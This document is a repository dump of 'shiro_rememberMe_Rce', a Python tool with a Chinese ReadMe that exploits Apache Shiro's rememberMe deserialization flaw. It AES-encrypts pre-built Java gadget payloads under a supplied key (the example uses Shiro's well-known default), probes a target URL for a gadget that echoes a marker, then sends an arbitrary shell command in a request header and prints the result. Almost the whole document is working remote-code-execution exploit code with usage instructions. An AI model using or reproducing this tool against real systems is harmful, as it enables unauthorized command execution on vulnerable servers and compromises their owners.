├── gadget ├── Jdk7u21.class ├── Jdk8u20.class ├── CommonsBeanutils1.class ├── CommonsBeanutils2.class ├── CommonsCollectionsK1.class └── CommonsCollectionsK2.class ├── assets ├── markdown-img-paste-20200725205353408.png └── markdown-img-paste-20200725205414673.png ├── ReadMe.md └── shiro_rememberMe_Rce.py /gadget/Jdk7u21.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/admintony/shiro_rememberMe_Rce/HEAD/gadget/Jdk7u21.class -------------------------------------------------------------------------------- /gadget/Jdk8u20.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/admintony/shiro_rememberMe_Rce/HEAD/gadget/Jdk8u20.class -------------------------------------------------------------------------------- /gadget/CommonsBeanutils1.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/admintony/shiro_rememberMe_Rce/HEAD/gadget/CommonsBeanutils1.class -------------------------------------------------------------------------------- /gadget/CommonsBeanutils2.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/admintony/shiro_rememberMe_Rce/HEAD/gadget/CommonsBeanutils2.class -------------------------------------------------------------------------------- /gadget/CommonsCollectionsK1.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/admintony/shiro_rememberMe_Rce/HEAD/gadget/CommonsCollectionsK1.class -------------------------------------------------------------------------------- /gadget/CommonsCollectionsK2.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/admintony/shiro_rememberMe_Rce/HEAD/gadget/CommonsCollectionsK2.class 
-------------------------------------------------------------------------------- /assets/markdown-img-paste-20200725205353408.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/admintony/shiro_rememberMe_Rce/HEAD/assets/markdown-img-paste-20200725205353408.png -------------------------------------------------------------------------------- /assets/markdown-img-paste-20200725205414673.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/admintony/shiro_rememberMe_Rce/HEAD/assets/markdown-img-paste-20200725205414673.png -------------------------------------------------------------------------------- /ReadMe.md: -------------------------------------------------------------------------------- 1 | # shiro_rememberMe_Rce 2 | 3 | ## 描述 4 | 5 | 利用长亭xray高级版的回显Gadget重写的一个shiro反序列化利用工具。 6 | 7 | ## 用法 8 | 9 | 建议先用其他工具找到可以利用的shiro密码,然后使用此工具进行利用。 10 | 11 | ``` 12 | python shiro_rememberMe_Rce.py targetUrl shiroKey command 13 | python shiro_rememberMe_rce.py http://192.168.0.106:8080/login kPH+bIxk5D2deZiIxcaaaA== id 14 | ``` 15 | 16 | ![](assets/markdown-img-paste-20200725205353408.png) 17 | 18 | ![](assets/markdown-img-paste-20200725205414673.png) 19 | 20 | ## 更新说明 21 | 22 | v0.1版本: 23 | - 实现用CommonsCollectionsK1这个gadget执行命令 24 | 25 | v0.2版本: 26 | - 添加有新的回显gadget,共6个 27 | - 添加自动枚举可用的gadget功能 28 | 29 | ## 参考 30 | 31 | 参考文章[shiro新姿势:初探xray高级版shiro插件](https://www.anquanke.com/post/id/211228) 32 | -------------------------------------------------------------------------------- /shiro_rememberMe_Rce.py: -------------------------------------------------------------------------------- 1 | #coding:utf-8 2 | import sys 3 | import base64 4 | import uuid 5 | from Crypto.Cipher import AES 6 | import requests,re,random 7 | 8 | gadget_list=['CommonsBeanutils1','CommonsBeanutils2','CommonsCollectionsK1','CommonsCollectionsK2','Jdk7u21','Jdk8u20'] 9 | source = 
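list('abcdefghijklmnopqrstuvwxyz0123456789')  # alphabet for the random echo marker

# AES block size in bytes; the cookie is AES-CBC, so the payload is PKCS#7-padded to it.
AES_BLOCK_SIZE = 16
# Sentinel the remote command is made to echo so its output can be located in the body.
RESULT_MARKER = 'command-result-end'
# Seconds to wait per request; without a timeout a hanging target blocks the scan forever.
REQUEST_TIMEOUT = 10


def pkcs7_pad(data):
    """Return *data* padded to a multiple of AES_BLOCK_SIZE per PKCS#7.

    A full block of padding is appended when *data* is already aligned, so
    the padding always decodes unambiguously on the server side.
    """
    pad_len = AES_BLOCK_SIZE - len(data) % AES_BLOCK_SIZE
    return data + bytes([pad_len]) * pad_len


def load_aes_key(key):
    """Decode the base64 Shiro key and check it has a legal AES key length.

    Fails early with a readable message instead of letting AES.new() raise on
    a key of the wrong size.

    Raises:
        ValueError: *key* is not valid base64 or not 16/24/32 bytes long.
    """
    raw = base64.b64decode(key)
    if len(raw) not in (16, 24, 32):
        raise ValueError(
            'shiroKey must be the base64 of a 16/24/32-byte AES key, got {} bytes'.format(len(raw)))
    return raw


def encode_rememberme(key, gadget):
    """Build the rememberMe cookie value that carries *gadget*'s payload.

    Reads ./gadget/<gadget>.class (the bytes are sent as-is; despite the
    suffix these files are the pre-built serialized gadget payloads) and
    wraps them in the layout Shiro's AES cipher service decrypts:
    base64(iv || AES-CBC(key, iv, PKCS7(payload))) with a random 16-byte IV.

    Args:
        key: base64-encoded AES key (e.g. Shiro's well-known default key).
        gadget: file name under ./gadget/ without the .class suffix.

    Returns:
        The cookie value as a str, ready to be placed in the Cookie header.

    Raises:
        ValueError: *key* is not a valid AES key.
        OSError: the gadget file cannot be read.
    """
    # Read-only is all we need; the original 'rb+' opened the payload writable.
    with open('./gadget/' + gadget + '.class', 'rb') as fh:
        payload = fh.read()
    iv = uuid.uuid4().bytes  # 16 random bytes, prepended so the server can decrypt
    cipher = AES.new(load_aes_key(key), AES.MODE_CBC, iv)
    ciphertext = cipher.encrypt(pkcs7_pad(payload))
    # b64encode returns bytes; decode it, otherwise the header would carry "b'...'".
    return base64.b64encode(iv + ciphertext).decode('ascii')


def find_gadget(url, key):
    """Probe the target with each known echo gadget; return the first that works.

    Each probe sends the gadget's cookie together with a random 5-character
    marker in the ``Testecho`` request header. A gadget that runs on the
    target copies the marker into the ``Testecho`` response header; a missing
    or different value counts as "not supported".

    Returns:
        The gadget name, or None when none of them echo the marker.
    """
    for gadget in gadget_list:
        # Fresh marker per probe so a header reflected or cached from an earlier
        # probe (or by the application itself) cannot yield a false positive.
        marker = ''.join(random.sample(source, 5))
        headers = {
            "Cookie": "rememberMe={}".format(encode_rememberme(key, gadget)),
            "Testecho": marker,
        }
        res = requests.get(url, headers=headers, timeout=REQUEST_TIMEOUT)
        if res.headers.get('Testecho') == marker:
            print("[+] find support gadget: {}".format(gadget))
            return gadget
        print("[-] not support gadget: {}".format(gadget))
    return None


_RESULT_RE = re.compile(r'(.*)' + re.escape(RESULT_MARKER), re.DOTALL)


def extract_command_output(body):
    """Return everything in *body* before the last RESULT_MARKER, or None if absent.

    The greedy DOTALL match keeps the original behaviour: multi-line output is
    captured up to the final occurrence of the marker.
    """
    match = _RESULT_RE.search(body)
    return match.group(1) if match else None


def attack():
    """CLI entry point: ``targetUrl shiroKey command``.

    Enumerates a working gadget, then sends the command in the ``Testcmd``
    header and prints whatever the target echoes back before RESULT_MARKER.
    """
    if len(sys.argv) != 4:
        print('usage: python {0} targetUrl shiroKey command\n'
              'e.g.:python {0} http://192.168.0.106:8080/login kPH+bIxk5D2deZiIxcaaaA== id\n'
              'GitHub:https://github.com/admintony/'.format(sys.argv[0]))
        return
    url, key, command = sys.argv[1:4]
    gadget = find_gadget(url, key)
    if gadget is None:
        # The original went on to open './gadget/None.class' and crashed here.
        print("[-] no supported gadget found, aborting")
        return
    print("[+] start execute command")
    headers = {
        "Cookie": "rememberMe={}".format(encode_rememberme(key, gadget)),
        # '&&' means the marker is only echoed when the command exits 0, so a
        # failing command is indistinguishable from a non-vulnerable target.
        "Testcmd": command + " && echo " + RESULT_MARKER,
    }
    res = requests.get(url, headers=headers, timeout=REQUEST_TIMEOUT)
    output = extract_command_output(res.text)
    if output is not None:
        print("[+] command execute result:")
        print(output)
    else:
        print("[+] 可能不存在漏洞,请人工查验")


if __name__ == "__main__":
    attack()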